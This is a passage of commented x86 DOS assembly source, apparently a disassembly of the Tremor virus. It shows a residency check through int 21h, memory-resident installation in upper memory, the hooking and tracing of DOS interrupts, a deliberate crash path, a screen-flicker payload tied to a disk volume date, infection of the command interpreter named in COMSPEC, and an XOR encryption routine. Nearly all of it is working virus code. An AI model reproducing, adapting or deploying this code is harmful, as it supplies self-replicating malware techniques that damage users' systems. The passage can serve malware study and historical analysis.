cmp ax,31dh ; dosversion < 3.30 -> stop
ja loc_171
loc_170: jmp vir_install_done
my_call equ $+1
loc_171: mov ax,0f1e9h ; "tremor"
int 21h
selftest equ $+1
cmp ax,0cadeh
je loc_170
xor di,di ; di=0
mov ax,40h
mov ds,ax
mov bp,ds:[di+13h] ; get max-memory
mov cl,6
shl bp,cl ; bp = top of memory
mov ah,62h ;
int 21h ; get psp
mov ds,bx ;
push word ptr ds:[di+2ch] ; push env-seg
push ds ; ds = psp-segment
mov cl,90h ; mov cl,"nop"
mov ax,5800h ; get mem strategy
int 21h ;
xor ah,ah ;
push ax
mov ax,5801h ; set it to "give umb first"
mov bx,80h
int 21h
mov ax,5802h ; get mem linkstate
int 21h
xor ah,ah
push ax
mov ax,5803h ; link umbs
mov bx,1
int 21h
jc loc_172
mov ah,48h ; get memory
mov bx,0ffffh
int 21h ; how much is there
mov ah,48h
int 21h
mov es,ax
cmp ax,bp
jae loc_173 ; enough !
dec ax ; else try xms-umbs
mov es,ax
mov es:[di+1],di
loc_172: mov ax,4300h ; xms installed ?
int 2fh
cmp al,80h
jne loc_174 ; no : jmp
mov ax,4310h ; get xms-entry
int 2fh
push cs
pop ds
mov word ptr ds:[si+offset bp_flag-offset cda ],bx
mov word ptr ds:[si+offset bp_flag-offset cda+2],es
mov ah,10h ; get umb
mov dx,0ffffh ; how much available ?
call dword ptr ds:[si+offset bp_flag-offset cda]
cmp bl,0b0h ; check errorcode.
jne loc_174 ; "out of mem" : jmp
; -> request all memory
mov ah,10h
call dword ptr ds:[si+offset bp_flag-offset cda]
dec ax ; "ok" -> ax=1
jnz loc_174 ; nz -> ax has not been "1"
mov es,bx ; else : segment in bx
loc_173: mov cl,0c3h
mov ax,es
dec ax
mov ds,ax
mov byte ptr [di],5ah ;
mov ds:[di+1],di
sub word ptr ds:[di+3],paras_needed
call getnextmcb
mov word ptr cs:[si+offset trem_mcb-offset cda],ax
inc ax
mov es,ax ; es = future virusseg
loc_174: pop bx
mov ax,5803h
int 21h
pop bx
mov ax,5801h
int 21h
pop ds
mov cs:[si+offset gettremmem-offset cda],cl
cmp cl,90h
jne loc_175
push ds
pop es
mov bx,0ffffh
mov ah,4ah
int 21h
mov ax,paras_needed
sub ds:[di+3],ax
sub bx,ax
mov ah,4ah
int 21h
mov ax,ds
inc ax
add ax,bx
mov es,ax ; es=virussegment
loc_175: push si ; si = offset 0cda
push cs
pop ds
sub si,offset cda - offset extra
mov cx,offset buffer - offset extra
mov di,offset extra
rep movsb ; copy virus-code
; to dest-memory
add di,32 ; skip buffer
sub si,offset buffer-offset writevirus
mov cx,offset buffer-offset writevirus
rep movsb
pop si ; pop offset cda
push es
;----------------------------( get int 21h)-----
mov ax,3521h ; get int 21
int 21h
pop ds ; ds=virus-seg
cwd ; dx=0
mov di,offset random_1
mov [di],dx
mov word ptr ds:[org_487],di;
mov di,82h ;
mov ds:[di+ 6],es ; -> int 21h
mov ds:[di+ 4],bx
mov ds:[di+16h],es
mov ds:[di+14h],bx
;----------------------------( get int 15h )-----
mov al,15h
int 21h
mov ds:[di+18h],bx
mov ds:[di+1ah],es
call setflag_cs_00
xor cx,cx
call get_1stmcb
mov word ptr cs:[si+offset dos_seg-offset cda],es
loc_176: or cx,cx
jnz loc_177
mov ax,ds ; ds=mcb-seg
inc ax
cmp ax,ds:[di+1] ; mcb-owner = itself ?
jne loc_177 ; no.......
mov cx,ax ; else -> segment in cx
push ds
loc_177: cmp byte ptr cs:[si+offset psycholabel-offset cda],90h
je loc_178 ; if "nop" then low-mem
cmp byte ptr [di],5ah ; last mcb reached ?
jne loc_179 ; if "yes"-> abort scan
trem_mcb equ $+1
mov ax,0eef4h
jmp loc_181
loc_178: cmp word ptr ds:[di+offset psycholabel+16+2],0c402h
jne loc_179
cmp word ptr ds:[di+offset psycholabel+16+4],0f24h
je loc_180
loc_179: push ds
pop es
call getnextmcb
jmp loc_176
loc_180: mov byte ptr es:[di],5ah ; vir-mcb found
mov ds:[di+1],cx ; set owner = itself
loc_181: pop cx ; get low_dos_mcb
inc cx
inc ax
mov ds,cx
mov word ptr cs:[si+offset low_dos_mcb -offset cda],cx
mov word ptr cs:[si+offset low_dos_mcb_2-offset cda],cx
mov word ptr cs:[si+offset low_dos_mcb_3-offset cda],cx
call sub_56
mov di,4eh
call sub_57
mov word ptr ds:[di+6],offset newint15
push ax ; save vir-seg
push cs
pop ds
mov word ptr ds:[si+offset org_cf0-offset cda],0
push ax ; save virus-seg
mov ax,3501h ; get int 01
int 21h
mov di,bx
mov bp,es
mov ah,25h ; set tracer-int
lea dx,[si+offset newint01-offset cda]
int 21h
pop es ; get virus-seg
pop ax
or ah,1
push ax
mov ah,30h
call dword ptr es:[internal_21]
mov ax,2501h ; reset tracer-int
mov dx,di
mov ds,bp
int 21h
push cs
pop ds ; ds=cs
push si ; save offset cda
add si,offset trace_result-offset cda
mov di,offset internal_21
movsw ; copy dos-entry to
movsw ; es=virus-segment
; ds=cs
pop si ; get vir-entry
mov ax,word ptr ds:[si+offset org_cf0-offset cda]
or ax,ax
jnz loc_183
low_dos_mcb equ $+1
mov ax,0
mov ds,ax
mov dx,5 ; set int21 to inttable->
mov ax,2521h ; crash the machine
int 21h
jmp loc_188
loc_183: xor bx,bx
dec ax ; ax = mcb-seg to check
call check_my_mcb
jz loc_184 ; nz= size > 0a000, ax=size
; zf= size <=0a000, cx=size
sub ax,10h ;
call check_my_mcb ;
jnz loc_182 ;
loc_184: cli ; cx = size of mcb
mov bp,ds ;
locloop_185: inc bp
mov ds,bp ; ds = psp-seg
xor bx,bx
loc_186: mov ax,cs:[si+offset trace_result -offset cda]
cmp ax,[bx] ; psp:000, dort steht aber 20cd...
jne loc_187
mov ax,cs:[si+offset trace_result+2 -offset cda]
cmp ax,ds:[bx+2]
jne loc_187
mov word ptr ds:[bx ],5 ; offset 5
low_dos_mcb_2 equ $+3
mov word ptr ds:[bx+2],0 ; in low-dos-seg
loc_187: inc bx
cmp bl,10h
jne loc_186
loop locloop_185
loc_188: pop es ; pop virus-segment (umb)
push cs
pop ds
mov ah,1ah ; set dta
lea dx,[si+offset buffer-offset cda]
mov bx,dx ; dta in umb !
int 21h
mov ah,4eh ; findfirst
mov cx,8 ; attribut = volume !
lea dx,[si+offset anyfile-offset cda]
int 21h ;-----------------------
; volume found :
mov ax,ds:[bx+16h] ; get files time
mov cx,ds:[bx+18h] ; get files date
volume_time equ $+1
cmp ax,6f55h ; time
jne loc_189 ; 13:58:42
volume_date equ $+2
cmp cx,1981h ; date=1981h=
je loc_190 ; 12-1-92
; activate screen flickering
loc_189: mov byte ptr es:[offset psycholabel],0ebh
loc_190: mov word ptr es:[offset volume_time],ax
mov word ptr es:[offset volume_date],cx
push es ; es=ds=virseg (umb)
pop ds
cmp byte ptr ds:[offset psycholabel],0ebh
je loc_191
low_dos_mcb_3 equ $+1
mov bx,0
mov ds,bx
mov ax,2515h
mov dx,0053h ; set int 15h
int 21h ;
loc_191: pop ds ; get environment-segment
xor bx,bx
; search comspec=
loc_192: cmp word ptr [ bx],4f43h ; 'co'
jne loc_193
cmp word ptr [bx+6],3d43h ; 'c="
je loc_194
loc_193: inc bx ;
cmp bh,8
jne loc_192
jmp vir_install_done
;-------------- ( infect )-------------------
loc_194: lea dx,[bx+8] ; comspec found.
mov ax,4300h ; bx points to string in
mov bx,0faceh ; comspec
int 21h
call sub_54
sub_54: pop si ; relocate again..
xor ax,ax
lea di,[si+offset extra-offset sub_54]
mov cx,(offset kill_label1-offset extra) / 2
push cs
pop es
kill_label1: rep stosw
add di,offset check_my_mcb-offset kill_label1
mov cx,(offset buffer-offset check_my_mcb)
rep stosb
start_psp equ $+1
mov bx,3c4h
mov ds,bx
push ds
pop es
mov dx,80h
mov ah,1ah ; set dta to psp:80h (default)
int 21h
com_flag equ $+1
mov al,1
or al,al
jz loc_196
mov word ptr ds:[101h],103h ; set jmp in com-file
init_jump equ $-2
push cs
jmp loc_197
loc_196: cli
mov ax,cs
init_ss equ $+1
sub ax,0
mov ss,ax
init_sp equ $+1
mov sp,0
mov ax,cs
init_cs equ $+1
sub ax,0
push ax
init_ip equ $+1
loc_197: mov ax,100h
push ax
xor ax,ax
mov bx,ax
mov cx,ax
mov si,ax
mov di,ax
mov bp,ax
; in : bx=0, ds=cs
check_my_mcb: mov ds,ax ;
cmp byte ptr [bx],44h ; data-mcb.
je loc_198
cmp byte ptr [bx],4dh ; mem-mcb
jne loc_ret_199
loc_198: mov ax,ds:[bx+3] ; size of mcb
cmp ah,0a0h ; hi-size > a0
ja loc_ret_199
xchg ax,cx
xor bp,bp ;-> zf, else nz
loc_ret_199: retn
sub_56: mov word ptr ds:[di+6],offset virint21
sub_57: mov byte ptr ds:[di+5],0eah
mov ds:[di+8],ax ; jmp tremor:int21
retn ;
data_x01 dw 0
data_x02 dw 0
writevirus: call code_decode
mov cx,4000
mov dx,offset extra
mov ah,40h
call dword ptr ds:[internal_21]
push ax
push cx
org_1081 equ $+1
mov al,0
mov byte ptr ds:[data_103-buf_len],al ; -> add [di],al
call code_decode
pop cx
pop ax
code_decode: mov ax,0
mov di,offset buffer
mov cx,0
xdata_103 db 31h ; xor [di],ax
xdata_0108 db 5 ; 31 5 = xor [di],ax
db 5 ; 31 35 = xor [di],si
xdata_0109 dw 0 ; = add ax,xxxx
inc di
inc di
loop locloop_200
tempint24: xor al,al
;---------------------------------------------( end of virus )------
buf_len equ offset buffer-offset writevirus
zdata_103 equ offset xdata_103 -offset writevirus
zdata_0108 equ offset xdata_0108-offset writevirus
zdata_0109 equ offset xdata_0109-offset writevirus
ztempint24 equ offset tempint24 -offset writevirus
buffer: db 32 dup (?)
sub_58 equ $
data_103 equ $+zdata_103
data_0108 equ $+zdata_0108
data_0109 equ $+zdata_0109
posint24 equ $+ztempint24
code_seg ends
end start